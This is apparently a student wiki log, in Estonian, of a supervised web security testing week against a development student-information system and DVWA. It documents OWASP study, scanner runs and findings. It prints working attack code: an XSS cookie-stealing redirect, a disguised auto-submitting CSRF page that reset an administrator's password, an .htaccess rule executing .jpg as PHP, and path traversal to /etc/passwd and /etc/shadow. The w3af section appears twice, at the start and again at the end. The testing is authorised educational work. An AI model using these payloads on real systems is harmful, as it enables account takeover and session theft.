Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Arvamused intensiivõppe nädala kohta ==

Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.

Urmo: Intensiivõppe nädalaga sai õpitud nii mõndagi huvitavat veebiturve ja selle testimise kohta. Kuna aega oli vähe, siis sai hulgaliselt kogemust ja oskust reaalselt planeerida mahukat tööd täiesti nullist kuni reaalse rakendatava tulemuseni ning pani proovile stressitaluvuse tõestamaks pinge all jätkusuutlikku töötamist. Intensiivõppe nädalal võiksid osaleda kõik, kellel väheke tahtmist midagi uurida ja korda saata ning saada reaalset töökogemust ennem töömaailma sukeldumist.

== Tegijad ==
Alo Konno A21

Urmo Lihten A21

Taavi Podžuks A22

Matis Alliksoo A22

Sander Saarm A22

== Juhendajad ==
Mart Mangus

Margus Ernits

Valter Kungla

Security team

2012-03-30T20:50:27Z

Ulihten: /* 3. päev */

== 1. päev - Materjalidega tutvumine ==

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

A1: Injection - Urmo
A2: Cross-Site Scripting (XSS) - Alo
A3: Broken Authentication and Session Management - Sander
A4: Insecure Direct Object References - Alo
A5: Cross-Site Request Forgery (CSRF) - Taavi
A6: Security Misconfiguration - Matis
A7: Insecure Cryptographic Storage - Matis
A8: Failure to Restrict URL Access - Urmo
A9: Insufficient Transport Layer Protection - Taavi
A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] <br>
Taavi esitlus [[Media:A9.pdf]] <br>
Taavi esitlus [[Media:A5.pdf]] <br>
Matise esitlus [[Media:Insecure Cryptographic Storage.pdf]] <br>
Matise esitlus [[Media:Security Misconfiguration.pdf]] <br>
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] <br>

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==
===Security Team tegevusplaan===
1. Päev
1.1 Tutvuda OWASP’iga.
1.2 Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.
1.3 Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.
2. Päev
2.1 Esitada tiimi tegevusplaan.
2.2 Tutvuda turvariskidega natuke põhjalikumalt.
2.3 Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.
2.4 Täiendada esimese päeva ettekannet.
3. Päev
3.1 Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.
3.2 Saadud tulemuste dokumenteerimine.
4. Päev
4.1 Saadud tulemuste esitlemine ettekandega
5. Päev
5.1 Tulemuste parandamine wiki’s.

=== Alo tegevus ===

http://www.acunetix.com/support/vulnerability-checks.htm
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting
http://www.youtube.com/watch?v=SG1cvGQ971g
http://www.isecom.org/research.html
http://evuln.com/tools/
http://sectools.org/tag/web-scanners/
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/
http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.
Antud programm võimaldab skännida:
Cross-Site Scripting (XSS)
SQL Injection (blind test)
File inclusion
Code Execution
LDAP Injection
Cross Frame Scripting
SQL Injection (error msg. test)
CRLF Injection
Directory Travelsal
XPath Injection
URL Redirection
Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".
Määrata ära tuli ka, et mitu päringut sekundis tehakse.
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.
Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.
Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.
Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.
Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.
Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.
Ründe stiiliks määrata Pitchfork.
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.
Kahjuks ka see rünne ei toiminud teadmata põhjusel.
Proovitud sai ka lühemate nimekirjadega ja edutult.

Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt.
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.
Võtsime lehe Source Code lahti
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.
Current Password lahtri jätsime samaks.
Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".
Salvestasime faili ja käivitasime selle.
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna ".

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev - Dev-ÕIS'i turvatestimine==

=== Alo tegevus ===
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.<br>
Faile saab alla laadida enda profiili all õppesooritustes.<br>
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.<br>
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.<br>
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.<br>
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.<br>
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.<br>

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
====Burp suite====

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

====Nessuse algkäivitamine====
Valida backtrackist vulnerability scannerite alt nessus ning edasi nessus register .<br> Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.<br> Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)<br>
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)<br>
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.<br>
Järgnevalt valida nessus start.<br>
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.<br>
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.

=== Matise tegevus ===

====Väike upload tegevus, mis võiks olla teisiti====
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.
Proovisime üles laadida:
<li>filmi
<li>exe
<li>jpm faile
<br>kõik läks läbi ja sai uploadida.
<br>Sellises kohas võiks olla süsteem tehtud <b>whitelisti</b> põhimõttel,
<br>et lubatud oleks ainult:
<li>.doc
<li>.docx
<li>.pdf

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
